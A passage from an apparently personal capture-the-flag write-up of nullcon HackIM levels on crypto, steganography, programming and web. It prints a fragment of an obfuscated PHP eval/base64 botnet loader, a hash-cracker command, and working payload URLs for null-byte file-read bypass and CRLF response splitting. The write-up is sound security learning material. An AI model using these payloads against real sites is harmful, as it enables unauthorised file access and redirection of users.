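SAMPLE = encode_whitespace("hello, flag", tab_is="0")   # constructed input for the demo

if __name__ == "__main__":
    print(repr(decode_either_polarity(SAMPLE)))
```

The same function handles the tr output above as well: feed it the raw file instead of the translated 0/1 string and the tr step disappears.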
Crypto Level 3: The Base Test
Official Hint: http://lmgtfy.com/?q=RFC+for+base+encoding
Page Source: ====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ====
Description: N/A
Analysis: I went through RFC 4648 twice but didn’t find anything that would directly lead me to
the flag. However, I got a basic idea of the patterns of the various base encodings.
My assumption on the given string was:
- Rot-13
- Reverse
- Base64
- Base32
I went through several combinations of the above assumptions and finally got the flag
with the following steps:
1. Remove the = characters from both ends of the given string.
2. Reverse the string:
“JVJDEVZWKZCFGTSGIRLUWVJTJJHFMUKXLFMUYT2NKJEEOTZSJRKU4RJ5HU6T2PJ5”
3. Apply base32 decoding:
“MR2W6VDSNFDWKU3JNVQWYYLOMRHGO2LUNE======”
4. Apply base32 decoding again to the result of step 3 to get the flag.
To reverse the text: http://textmechanic.com/Reverse-Text-Generator.html
To decode base 32 :http://online-calculators.appspot.com/base32/
Flag: duoTriGeSimalandNgiti
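The four steps above as a script. This is an added example, not code from the writeup; the only input taken from the page is the page-source string. Rather than hard-coding two base32 layers, peel() keeps decoding while the result is still printable ASCII, so the number of layers is discovered instead of assumed, and missing padding is repaired before each attempt.

```python
# Added example: automate the reverse + base32 + base32 chain of Crypto Level 3.
# PAGE_SOURCE is copied from the level; everything else is this example's own code.
import base64
import string

PAGE_SOURCE = "====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ===="
PRINTABLE = set(string.printable.encode())


def try_base32(data: bytes):
    """Decode one base32 layer, re-padding to a multiple of 8; None if it is not base32."""
    padded = data + b"=" * (-len(data) % 8)
    try:
        return base64.b32decode(padded)
    except ValueError:            # binascii.Error is a ValueError subclass
        return None


def peel(data: bytes, max_layers: int = 8) -> list:
    """Strip base32 layers until a decode fails or stops being printable ASCII."""
    layers = []
    for _ in range(max_layers):
        out = try_base32(data)
        if not out or any(b not in PRINTABLE for b in out):
            break
        layers.append(out)
        data = out
    return layers


def solve(page_source: str) -> str:
    """Strip the decorative '=' runs, reverse, then peel every base32 layer."""
    reversed_text = page_source.strip("=")[::-1].encode()
    layers = peel(reversed_text)
    if not layers:
        raise ValueError("no base32 layer found")
    return layers[-1].decode()


if __name__ == "__main__":
    for i, layer in enumerate(peel(PAGE_SOURCE.strip("=")[::-1].encode()), 1):
        print(f"layer {i}: {layer.decode()}")
```

The lowercase letters in the final string are what stops the loop: the RFC 4648 base32 alphabet is upper case only, so b32decode rejects it and the last printable layer is returned as the answer. Other candidate layers from the list above (base64, rot13) would slot into peel() in the same way.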
Crypto Level 4: Elucidate
Official Hint: N/A
Page Source: <!-- md5sum: ad4e2705406ef1197f03f93474e30020 -->
Description: Elucidate
Analysis: Nothing seemed better than sleeping rather than decoding that obfuscated PHP script by
hand. The first, laziest thing I decided to do was to look for an online tool that would do the job
without going through several decoding steps.
Eventually I came across an online tool:
http://www.whitefirdesign.com/resources/unobfuscate-php-hack-code.html
Now back to the analysis. Let us understand the script part by part:
<?php
$vaa8089358f2="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";@eval
($vaa8089358f2 ("**base 64 encoded string**"));
?>
- On the first line, a variable is set to a string represented by a mix of hexadecimal (\x) and
octal (\) escape sequences. Python uses the same escapes as PHP for hex and octal, so it is easy to
use the Python shell to see a “normalized” ASCII representation of these strings:
Python Shell Below:
>>> "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65"
'base64_decode'
- The next step was to decode the base64 encoded string.
- I used the online tool mentioned above and got an unformatted PHP script.
- A quick Google search revealed a PHP formatter at “http://www.prettyprinter.de”
- So by this time I had the decoded base64 string with proper formatting.
- Further analysis revealed another obfuscated script:
@eval($w67426c2c6071d5516d2011022955d36($d9917ccba06ba0e3ed151e1b9461ae76($xaa4294a0bca922b2cc
8b9a2789e95fa("yIIgnkcORC4eT5SRD0cho3s2WqMVXWozH4hRSSXY7B0YBDtdngd0cs+9f96rZnyjS/jj7hmZZ
8+87M2sTxT1NWZoRJljzDMMXNUXppQ/rLQG89Uy+9UlsxyVrWmoGozLR7ilMhAai8gyemgw0aVKsNMFMeo
j3UOjhsR6TP2Z4WVZvIzgmX9r/6j7l6mw1agjlawTPb9kZk08qlP08gXt8pxW2txJNVWt1uyqrZoOHyAjLA4Xd6la
nOsZj9e3lE9Fuy4bU/mZC5KemoeKUXECwb/WHKBDPY7lz8sIiNb2VU9Wq+MfSvwmzzxnphJxlvz3XtCOsSRL
mc/mUHEd5KcJUMfe1L8OjjXYn+/oSAnfxD7jKTxVNLWEmuLDzZL7omK1VavnU6kDb1C0nx7123qZguxg1v3+
xVMqCZ43iJoxENOxGzaOAA5zDFxXwzMZOthn+4XYQZCC/H9lIl6iIin+/BSG0Mf9310hya7rLywnQBBV3S1/h
Mc8+UE9B764+Uj7aalqKA+ZlpHY/LsW+Bcz3PqUjlUMeO79bsS67a7wzYKhscgvTBp+4bF0TV2mSxTeEJzBnu8
J623YhwZrQTZf94R5de1JCTAXpfLY5KVyIrk0M/bxjcFPDTzaISXHrMXb5/a0FGXHtOY1VgecMP/kmSRdCAAx
k/ojrAVaJrfy+bSRPFu5MIsw1UT2RiRRIYmvsGkUC+Fj8ks5Uu76Nni47+ARaclzp4jQFIY0MkIrUFslxscIUvmcV
qaeINrbpVI/unqFCWUlwirlfd9krZYM+r3k2gLeF/nv4uUmSP7Sf8/8EA0KyhkGsI7HZ/fsQ2QiGQhQ3p687p2CZ
+yklj4fKEmJcfq2JQ3vaqGGBwsxkhu0F81tXcT67WlED2M5BmZ2eDq2dkLqMC6z720S66eSxPLAAunJ1jgEAKN
737geMYA9xjMxqCxC"))));
- Inside it was yet another base64 encoded string.
- Now the online tool comes into play. The above script is of the form:
@eval(gzinflate(base64_decode(str_rot13("base64_encoded"))));
- The output revealed some kind of botnet behaviour; however, at this point I was least
bothered about that and kept observing it.
- A quick overview of the output drew my attention to the following variable:
$_4fa3332ef3d19e9840387434b8d28780 =
"\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143\x6f\156\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165\x6c\164\x73\157\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144\x65\144\x61\163\x66\165\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141\x6e\144\x61\163\x68\141\x76\151\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144\x74\150\x65\156\x6f\162\x6d\141\x6c\143\x6f\165\x72\163\x65\157\x66\164\x68\145\x70\150\x65\156\x6f\155\x65\156\x61";
- Hoping this would be the final step, I used the Python shell again. In case anyone doesn’t
have Python installed, the Google App Engine Python shell at http://shell.appspot.com/ would be
helpful, or there may be multiple other ways to decode it:
>>> "\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143\x6f\156\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165\x6c\164\x73\157\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144\x65\144\x61\163\x66\165\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141\x6e\144\x61\163\x68\141\x76\151\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144\x74\150\x65\156\x6f\162\x6d\141\x6c\143\x6f\165\x72\163\x65\157\x66\164\x68\145\x70\150\x65\156\x6f\155\x65\156\x61"
'onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomena'
Flag: onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomena
Crypto Level 5: Yeah! As you guessed, it’s Steganography
Official Hint: Yeah! As you guessed, it’s Steganography
Page Source: <!--
Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU
Omoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme
and!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!Oor
Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd
-->
Description: Llun Saving Bank is fed up with known encryption standards to store the data.
They decided to reinvent the wheel. Can you decode the data?
Analysis: A close look at the initials of the title “Llun Saving Bank” suggests LSB. I didn’t know
much about the LSB technique in text; however, I had come across it with images in some
wargame. I had a look at LSB on Wikipedia and got the idea of collecting the rightmost bit of each
character. I converted the given text into binary and, whoa, I was left with a long list of binary.
It was a real challenge to pick out the rightmost bits, so a simple Python script made the task
easier:
result = ''
ciphertext = '<paste binary here>'   # e.g. "01001000 01110011 00100000 ..."
bits = ciphertext.replace(' ', '')   # drop the spaces so every byte is exactly 8 characters
for i in range(7, len(bits), 8):     # index 7, 15, 23, ... is the rightmost bit of each byte
    result += bits[i]
print(result)
Note: The script accepts the binary with a space between each byte, something like
“01001000 01110011 00100000…” and so on, and strips the spaces before indexing.
On executing the Python script I got the LSB of each character, which I converted to ASCII using
http://home.paulschou.net/tools/xlate/, and there was our flag in plain text.
Flag: Learn howto Hide in Plain Sight
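The same extraction done directly on the cover text, without the detour through a binary dump, plus the matching embed function. This is an added example and not the author's script; the cover text is the page-source comment from this level, joined with newlines (a newline, like a space, has LSB 0, so the line breaks do not disturb the bit stream). The embed side shows why the cover looks the way it does: forcing a 1 into the LSB of a space turns it into "!", and of "a" into "a" or "`".

```python
# Added example (not the author's script): LSB-in-text extraction and embedding for
# Crypto Level 5. STEGO_TEXT is the page-source comment of the level.

STEGO_TEXT = "\n".join([
    "Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU",
    "Omoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme",
    "and!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!Oor",
    "Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd",
])


def lsb_extract(stego: str) -> str:
    """Collect ord(c) & 1 for every character and pack 8 bits per byte, MSB first."""
    bits = [ord(c) & 1 for c in stego]
    out = []
    for i in range(0, len(bits) - len(bits) % 8, 8):
        byte = 0
        for b in bits[i:i + 8]:
            byte = (byte << 1) | b
        out.append(chr(byte))
    return "".join(out)


def lsb_embed(cover: str, message: str) -> str:
    """Set the LSB of each cover character to the next message bit (8 cover chars per byte)."""
    bits = [(ord(c) >> (7 - k)) & 1 for c in message for k in range(8)]
    if len(bits) > len(cover):
        raise ValueError("cover text too short for message")
    stego = [chr((ord(c) & ~1) | bit) for c, bit in zip(cover, bits)]
    return "".join(stego) + cover[len(bits):]   # untouched tail of the cover


if __name__ == "__main__":
    print(lsb_extract(STEGO_TEXT))
```

Note that the cover needs eight characters per hidden byte, which is why a 31-character flag required a quote of 248 characters.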
Programming Levels
Programming Level 1: ROTOMATA
Official Hint: N/A
Page Source: <!-- We only know the first 6 characters: "Men at" -->
Description: Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, zk hjp gm
nso nntjj, phf sw vawwhnwer, pcum nu oeq ewllxqmqit
Analysis: I really didn’t spend much time decoding the whole string. Instead I analysed the
difference between the first three words and then googled for it.
Plain and cipher letter pairs with the shift between them (the shift is the character’s position,
counting from 0 and including spaces):
M-M=0
e-f=1
n-p=2
space=3
a-e=4
t-y=5
space=6
s-z=7
o-w=8
m-v=9
e-o=10
Hence the first three words I obtained were “Men at some”. After googling them, I got the
famous quote by William Shakespeare, which was the flag.
Flag: Men at some time are masters of their fates: The fault, dear Brutus, is not in our
stars, but in ourselves, that we are underlings
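The differencing table above, done programmatically. This is an added example, not the author's code: recover_shifts() subtracts a known-plaintext crib from the ciphertext position by position, and shift_decrypt() applies a hypothesised key schedule. The schedule used in the demo (shift equals the character's index, spaces counted) is what the six-character crib and the first three words support; treating it as the rule for the whole message is an assumption, and the crib function is how you check and extend it with the rest of the quote.

```python
# Added example: crib-based recovery of a position-dependent Caesar shift (Programming Level 1).
import string

LOWER = string.ascii_lowercase
CIPHERTEXT = ("Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, "
              "zk hjp gm nso nntjj, phf sw vawwhnwer, pcum nu oeq ewllxqmqit")
CRIB = "Men at"   # from the page-source comment


def recover_shifts(cipher: str, crib: str) -> list:
    """Per-position shift (cipher - plain) mod 26; None where there is no letter to compare."""
    shifts = []
    for c, p in zip(cipher, crib):
        if c.isalpha() and p.isalpha():
            shifts.append((LOWER.index(c.lower()) - LOWER.index(p.lower())) % 26)
        else:
            shifts.append(None)
    return shifts


def shift_decrypt(cipher: str, schedule) -> str:
    """Undo a position-dependent Caesar shift; schedule(i) returns the shift at index i."""
    out = []
    for i, c in enumerate(cipher):
        if c.isalpha():
            base = ord("A") if c.isupper() else ord("a")
            out.append(chr((ord(c) - base - schedule(i)) % 26 + base))
        else:
            out.append(c)
    return "".join(out)


if __name__ == "__main__":
    print(recover_shifts(CIPHERTEXT, CRIB))          # [0, 1, 2, None, 4, 5]
    # Hypothesis: shift = index. Checked here only for the first 27 characters.
    print(shift_decrypt(CIPHERTEXT[:27], lambda i: i))
```

Running recover_shifts() against the full quote instead of the six-character crib shows where the linear hypothesis stops holding, which is the point at which a guess about the schedule must give way to the recovered one.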
Programming Level 2: Pascal’s Triangle
Official Hint: N/A
Page Source: <!-- ex: The sum of all middle terms till first 6 rows is 9 -->
Description: The Flag is the sum of all middle terms till first 1337 rows of Pascal's Triangle
Analysis: This seemed easy at first sight. My first expectation was to find some ready-cooked
code, but that really didn’t work out; all I got was algorithms and some frustrated guy like me
crying on the discussion forums to get his erroneous triangle code working. I googled Pascal’s
triangle, went through Wikipedia on Pascal’s triangle, WolframAlpha on Pascal’s triangle...
Frustration takes you to any height of paranormal activity. After spidering and crawling through
the links, I came across some useful resources:
http://rosettacode.org/wiki/Pascal's_triangle
http://www.mathsisfun.com/pascals-triangle.html
http://www.mathwords.com/b/binomial_coefficients_pascal.htm
http://www.youtube.com/watch?v=OMr9ZF1jgNc
- So, all in all, time to do some serious coding.
- The challenge considers the middle term of the odd rows (the 1st, 3rd, 5th, ... rows are the only
ones with a single middle term; the page-source example is 1 + 2 + 6 = 9 for the first 6 rows).
- Wrote code in C and hoped it would work out; it failed.
- Looked for some Java code, which compiled successfully, but when I executed it I was staring at
my LCD: the program kept running for more than 30 seconds on my i5; that was a stack overflow.
- Time for some manual work again; looking it over, I realised that binomial coefficients could
get me the flag.
- Worked it out again, for the 3rd time now in Python, with unexpected hope; executed it, got
something, and voila!!! That was the flag.
This was the Python script:
#!/usr/bin/python
from math import factorial
p = 0   # p = n/2, the index of the middle term of row n
s = 0
for n in range(0, 1337, 2):   # rows 0, 2, 4, ..., 1336: the 1st, 3rd, 5th, ... of the first 1337 rows
    s += factorial(n) // (factorial(p) * factorial(n - p))   # C(n, n/2); // keeps it exact on Python 3
    p += 1
print(s)
Flag:4365932474188423707093600683230364311423941198777278660206654343120587216
667436233239359631257671906424254797004032326756653034333310397082007259357870
623427662432460587818667097226705645987145656659456934356498862160032628647508
069786551862253737753435645565104842509752373488183866315706330467111008238321
829445373767874422156015835789685633070319435688289548287438365157627110284786
6170999680296497
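The same sum computed without factorials, as an added example that is not part of the original writeup. The middle term of row 2k is C(2k, k), and consecutive middle terms satisfy C(2k, k) = C(2k-2, k-1) * (2k)(2k-1) / k^2, so the whole sum is one exact-integer running product. The practitioner's caveat on the script above: on Python 3 a single slash is float division, so factorial(n)/(...) silently loses digits (or overflows) once n is in the hundreds; use // or math.comb.

```python
# Added example: sum of the single middle terms of Pascal's triangle (Programming Level 2),
# via the ratio of consecutive central binomial coefficients. Cross-checked with math.comb.
from math import comb


def middle_term_sum(rows: int) -> int:
    """Sum of the middle terms of rows 0, 2, 4, ... below `rows` (the 1st, 3rd, 5th, ... rows)."""
    total, term = 0, 1          # term = C(0, 0)
    k = 0
    while 2 * k < rows:
        total += term
        k += 1
        # C(2k, k) = C(2k-2, k-1) * (2k)(2k-1) / k^2; k^2 always divides the product exactly
        term = term * (2 * k) * (2 * k - 1) // (k * k)
    return total


def middle_term_sum_comb(rows: int) -> int:
    """Independent check with math.comb (Python 3.8+)."""
    return sum(comb(n, n // 2) for n in range(0, rows, 2))


if __name__ == "__main__":
    print(middle_term_sum(6))      # 1 + 2 + 6 = 9, matching the page-source hint
    print(middle_term_sum(1337))   # the flag: a 401-digit integer
```

The running-product form does 669 multiplications and divisions on integers of at most 401 digits, against the script's 669 evaluations of factorial(1336)-sized numbers, so it is the version to reach for when the row count grows.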
Programming Level 3: Your Brainfuck Sir...
Official Hint: N/A
Page Source: <!-- md5sum: 4f1ec9481c0f0ae0a199ea5c8dedf62d -->
Description: Debug bfcode to get the flag
Analysis: I had encountered Brainfuck earlier but never this way. A Google search for a Brainfuck
interpreter led to http://www.iamcal.com/misc/bf_debug/ . I executed the given code without any
input in the interpreter and observed the result. Something appeared partially, which didn’t seem
to carry any useful meaning. Tried some random input and got the same output again and again.
Maybe a defect in the interpreter, LOL. It’s MANUAL time now.
I glanced through the Wikipedia article on Brainfuck, where I found the small “Hello World”
program. I executed it in the interpreter and got the output successfully. I observed that in the
“Hello World” program each line ends with a period. The period has a special meaning in
Brainfuck: it is the output instruction (it prints the byte under the pointer), which the given
Brainfuck code was missing. GOT IT!!! So appending a period at the end of each line was all it
took to get the flag.
Flag: ...In fact, never ever use gets() or sprintf(), period. If you do we will send evil dwarfs
after you..
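A minimal Brainfuck interpreter together with the "append a period to each line" fix, as an added example; the challenge's bfcode is not reproduced on the page, so the program below is constructed for the demo. It shows the behaviour the author observed: a program with no "." runs to completion and prints nothing, and adding "." to each line only inserts output instructions, never changing the cell arithmetic.

```python
# Added example (not the challenge's bfcode): tiny Brainfuck interpreter and the line-period fix.


def run_brainfuck(code: str, inp: bytes = b"", tape_size: int = 30000) -> bytes:
    """Execute Brainfuck `code`; returns everything written by '.' as bytes."""
    # Pre-match brackets so jumps are O(1) and unbalanced code is rejected up front.
    jump, stack = {}, []
    for pos, ch in enumerate(code):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at {pos}")
            start = stack.pop()
            jump[start], jump[pos] = pos, start
    if stack:
        raise ValueError(f"unmatched '[' at {stack[-1]}")

    tape = bytearray(tape_size)
    ptr = pc = in_idx = 0
    out = bytearray()
    while pc < len(code):
        ch = code[pc]
        if ch in "<>":
            ptr += 1 if ch == ">" else -1
            if not 0 <= ptr < tape_size:
                raise IndexError("pointer left the tape")
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF        # 8-bit cells wrap around
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = inp[in_idx] if in_idx < len(inp) else 0   # EOF reads as 0
            in_idx += 1
        elif ch == "[" and tape[ptr] == 0:
            pc = jump[pc]                             # skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            pc = jump[pc]                             # back to the matching '['
        pc += 1                                       # every other character is a comment
    return bytes(out)


def add_missing_periods(code: str) -> str:
    """The fix from the level: make every non-empty line print the cell it finishes on."""
    return "\n".join(line.rstrip() + "." for line in code.splitlines() if line.strip())


# Constructed sample: each line leaves the next character under the pointer but never prints it.
SILENT_PROGRAM = "\n".join([
    "++++++++[>++++++++<-]>+",     # cell1 = 65 -> 'A'
    "+",                           # 66 -> 'B'
    "+",                           # 67 -> 'C'
])

if __name__ == "__main__":
    print(run_brainfuck(SILENT_PROGRAM))                       # b''
    print(run_brainfuck(add_missing_periods(SILENT_PROGRAM)))  # b'ABC'
```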
Programming Level 4: Substitute Problem
Official Hint: N/A
Page Source: <!-- md5sum: 31178aa23ef43566009d97f38a470279 -->
Description: deobfus
Analysis: There wasn’t much to do with this; everything was self-explanatory on the page itself.
The only things this challenge required were plenty of time and lots of concentration. For me, it
took nearly 2 continuous hours to get through all the iterations. Probably some hardcore
programmer would have written a simple script to get it done in a few seconds, so my time
complexity on this problem was exponentially worse than the programmer’s.
Final iteration revealed the code as:
SEDULoUSLY ESCHEw oBFUSCAToRY HYPERVERBoSITY A
N D P R o L I X I T Y 8 4 R o E D Y GREEN
On attempt with variation of case, got the final flag.
Flag: sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy green
Programming Level 5
Official Hint: N/A
Page Source: Nothing Interesting
Description: A pinch of salt for your coffee, Sir?
Analysis: I’m really bad at brute forcing and guessing unnatural passwords. Hoping to get it
right this time, I went to the salt.asp page and generated hashes for a few random keywords. Sorry,
I wouldn’t share those crazy ones; they nearly killed my system with overheating :D
The basic idea was to crack the hash and identify the salt, which was the flag for this
challenge. I looked around for an MD5 cracker and got one at http://3.14.by/en/md5. Next I tried
to crack the hashes of the random keywords. After a while my system temperature went above the
critical level and I had to shut down the process; it was a really disgusting job to watch the
LCD and wait for the cracker to do its job. The cracker doesn’t seem to understand that my
system is not a blade server, or maybe I don’t. On a final note, I decided to take the hash of
either a single word or a digit and crack that. The same boring task again: in the first set I
generated the hashes for 0-10, and on the second attempt, with the hash for “1”, I got my flag.
Working Steps:
1. On the page salt.asp input password as 1.
2. The hash thus generated for my system was “243dc4f11700aa3bd6c7de312bb0ca31”
(Note: each system will generate a unique hash).
3. Fire up the windows console , and type the following at the command prompt:
barswf_cuda_x32.exe -h 243dc4f11700aa3bd6c7de312bb0ca31 -c 0a
4. After approx. 2 minutes on my i5, the cracker successfully displayed the result.
5. There we had our key: "1c183e7"
6. That means "1" + salt "c183e7", since hash = Algo(password + salt).
7. In the given problem, 243dc4f11700aa3bd6c7de312bb0ca31 = md5("1" + "c183e7")
8. And finally my flag was c183e7 (note: each system will have a unique flag).
Flag: c183e7
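What the cracker was actually doing, as an added Python example (not code from the writeup or from BarsWF): the password is chosen by the attacker, so the only unknown is the salt, and the search runs over the salt alphabet. Both concatenation orders are tried because the page does not say which one salt.asp uses. The demo at the bottom recovers a constructed 3-character salt; the challenge's 6 hex characters are 16**6 candidates per order, a job for a native cracker rather than pure Python.

```python
import hashlib
import itertools


def md5_hex(text):
    """MD5 of a string as lowercase hex, the form salt.asp displayed."""
    return hashlib.md5(text.encode("ascii")).hexdigest()


def recover_salt(password, target_hash, alphabet, max_len):
    """Brute-force the salt behind hash = md5(password + salt) for a password
    we chose ourselves. Every salt of length 1..max_len over `alphabet` is
    tried in both concatenation orders, because the page does not say which
    order salt.asp uses. Returns (salt, order) or None."""
    target_hash = target_hash.lower()
    for length in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            salt = "".join(chars)
            if md5_hex(password + salt) == target_hash:
                return salt, "password+salt"
            if md5_hex(salt + password) == target_hash:
                return salt, "salt+password"
    return None


if __name__ == "__main__":
    # Constructed demo: a 3-character hex salt is 4096 candidates, instant in
    # pure Python; the challenge's 6 hex characters are 16**6 per order.
    demo_hash = md5_hex("1" + "a3f")
    print(recover_salt("1", demo_hash, "0123456789abcdef", 3))  # ('a3f', 'password+salt')
```

The check a practitioner wants before burning GPU time is in the second branch: if the server had hashed salt + password, a cracker configured for password + salt would never finish.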
Web levels
Web Level 1
Official Hint: N/A
Page Source: Nothing Interesting
Description: Can you view the bytes in password.asp from Me?
Analysis: As the description suggests, it was null byte injection. I had come across a null byte
problem on one of the wargames. Let's understand the problem. Our challenge was to read the
information from the file password.asp, which was somehow protected by the server. In the given URL
we can observe that the default parameter is test.txt. Multiple questions arise here:
why only test.txt as the parameter? If you don't do anything with a parameter, why take
one? Assume a real application, from my perspective; the idea with this level is this: we
have an application which takes a filename from us, reads it, and shows it to us. We found an
example input, "test.txt". We know there is sensitive information in password.asp, but we can't
get password.asp. So let's imagine that whoever wrote this application, which reads any file we
tell it to, wanted to keep us from reading anything but files which end in ".txt". So any input
we give it that doesn't end in ".txt" is rejected. Here's the problem: how do we get a file
which ends in ".asp" when the filename we provide has to end in ".txt"?
The answer obviously is the null byte, but that would be a partial answer to the
question "HOW?" In languages like ASP and PHP a null byte doesn't end a string; it's just
another character, and the length is tracked separately. In C and C++ a null byte terminates the
string, and the operating system file APIs that these interpreters call underneath take C strings. So
if we give a PHP script a filename to open that contains a null byte, the filename is different for PHP
and for the OS: "hello\0blah" (sent as hello%00blah in the URL) is the whole string to PHP, but it
is "hello" to the operating system. Some applications append a file extension to the end of any
filename we give them, so we give them "hello" and they open "hello.txt". Which is why we send
"hello.php%00": PHP sees "hello.php\0.txt", which passes the extension check, and the OS opens
"hello.php". (Current interpreters close this hole; PHP, for example, refuses filesystem paths
containing a null byte since 5.3.4. The ASP page in this challenge evidently did not.)
And after this long, boring, worthless explanation, here's the flag.
Flag: http://www.nullcon.net/challenge/wlevel-1-proc.asp?input=password.asp%00.txt
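The check-then-open mismatch as runnable code, an added example rather than the challenge's ASP: the suffix test runs on the interpreter's full string, the OS call sees only the bytes before the NUL. Python's own open() rejects embedded NULs, so the C-string truncation is simulated over a constructed dictionary of files, and the hardened handler shows the fix: reject the NUL (and path separators) before any filesystem call and allow-list the names.

```python
from urllib.parse import unquote

# Constructed stand-in for the web root; not the challenge's real files.
FILES = {
    "test.txt": "just a test file",
    "password.asp": "<% Dim password : password = \"...\" %>",
}


def os_open(name):
    """Model of the C-string file API under the interpreter: the OS only sees
    the bytes before the first NUL. (Simulated, because Python's own open()
    rejects embedded NULs with ValueError.)"""
    truncated = name.split("\x00", 1)[0]
    if truncated not in FILES:
        return 404, "not found"
    return 200, FILES[truncated]


def serve_vulnerable(raw_param):
    """wlevel-1 style handler: URL-decode, check the suffix on the whole
    decoded string, then hand the string to the OS."""
    name = unquote(raw_param)
    if not name.endswith(".txt"):
        return 403, "only .txt files may be viewed"
    return os_open(name)


def serve_hardened(raw_param):
    """Same check, but NUL, path separators and '..' are rejected before any
    filesystem call, and the name must be on an allow-list of .txt files."""
    name = unquote(raw_param)
    if "\x00" in name or "/" in name or "\\" in name or ".." in name:
        return 400, "bad filename"
    if not (name.endswith(".txt") and name in FILES):
        return 403, "only .txt files may be viewed"
    return os_open(name)
```

In a real handler the allow-list is replaced by resolving the name under the document root with realpath and checking the result stays inside it; the NUL rejection stays, because the resolution itself goes through the same C-string boundary.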
Web Level 2:
Official Hint: Judgment of Solomon
Page Source: Nothing Interesting
Description: Can you redirect ME to hackim.null.co.in?
Analysis: I had to go through the hint to get this one done. After a few attempts with variations of
the parameters, I arbitrarily went through the boring story on Wikipedia. The summary of the story
was: "Solomon suggested that the baby be split in half and each half given to one of the women
claiming to be the mother". So the hint refers to the word "split". A quick search for the string
"HTTP Splitting" returned several results. I studied a few of them, which showed various PoCs, and
realized that I had spent most of my time injecting into the HTTP response rather than redirecting it.
Finally I got the level done with several parameter variations.
Flag: http://www.nullcon.net/challenge/wlevel-2-proc.asp?page=%0d%0aHTTP/1.0%20302%20Found%0d%0aLocation:%20hackim.null.co.in
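What the flag's payload does to the response, as an added example (not the challenge's ASP code): the page does not show which response header the page parameter lands in, so the handler below copies it into a hypothetical X-Page header. After URL decoding the value contains CR LF, so the injected status line and Location header sit where a client expects headers. split_responses is a deliberately lenient model of a proxy or browser parsing that stream; real clients differ, which is why several parameter variations were needed.

```python
from urllib.parse import unquote

CRLF = "\r\n"
# The flag's query-string value after the URL decoding the server performs.
PAYLOAD = unquote("%0d%0aHTTP/1.0%20302%20Found%0d%0aLocation:%20hackim.null.co.in")


def header_value_is_safe(value):
    """A header value may not contain CR or LF; rejecting them is the whole fix."""
    return "\r" not in value and "\n" not in value


def build_response_vulnerable(page):
    """Hypothetical wlevel-2 handler: the `page` parameter is copied into a
    response header ("X-Page" is an assumption; the real header is not shown)."""
    return (
        "HTTP/1.0 200 OK" + CRLF
        + "X-Page: " + page + CRLF
        + "Content-Type: text/html" + CRLF
        + CRLF
        + "<html>nothing to see here</html>"
    )


def build_response_hardened(page):
    if not header_value_is_safe(page):
        raise ValueError("CR/LF in header value")
    return build_response_vulnerable(page)


def split_responses(raw):
    """Lenient model of a client reading the header block: any line that looks
    like a status line starts a new response. Returns [(status, headers)]."""
    head = raw.split(CRLF + CRLF, 1)[0]
    responses = []
    for line in head.split(CRLF):
        if line.startswith("HTTP/"):
            responses.append((line, {}))
        elif ":" in line and responses:
            name, value = line.split(":", 1)
            responses[-1][1][name.strip()] = value.strip()
    return responses
```

Modern frameworks apply the header_value_is_safe rule themselves and raise on CR/LF; the vulnerable handler stands for older ASP code that wrote the raw string.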
===========================================================================================
Web Level 3:
Official Hint: Proxies are golden friends
Page Source: <!-- If you're still reading, better register Mate :)-->
Description: Click here to Login || Click here to Register
Analysis: In this level we were entertained with two options, register and login. I clicked on both
of them and went through the page source; nothing seemed interesting. Had a thought that it
could be vulnerable to some kind of injection. Next I filled up the form and registered.
Wow, my registration was successful, didn't expect that though. But on login with those credentials
all I got was an error message "Only ADMINS are Welcome!". Came back again to the
registration page and tried another input. There I observed the page source, and cool, this time we
had something interesting, in this format:
<!--Debug Info: INSERT 'uname|pass|uname|uname@localhost.com|admin:no|comment:new user' INTO USER DB FILE -->
So it was all here: the parameter with admin:no was passed into the database. Now there was not
much to do; next I used Burp Suite to check how the parameters were passed.
On the last line we can observe inside the window how the parameters are passed to the server. This
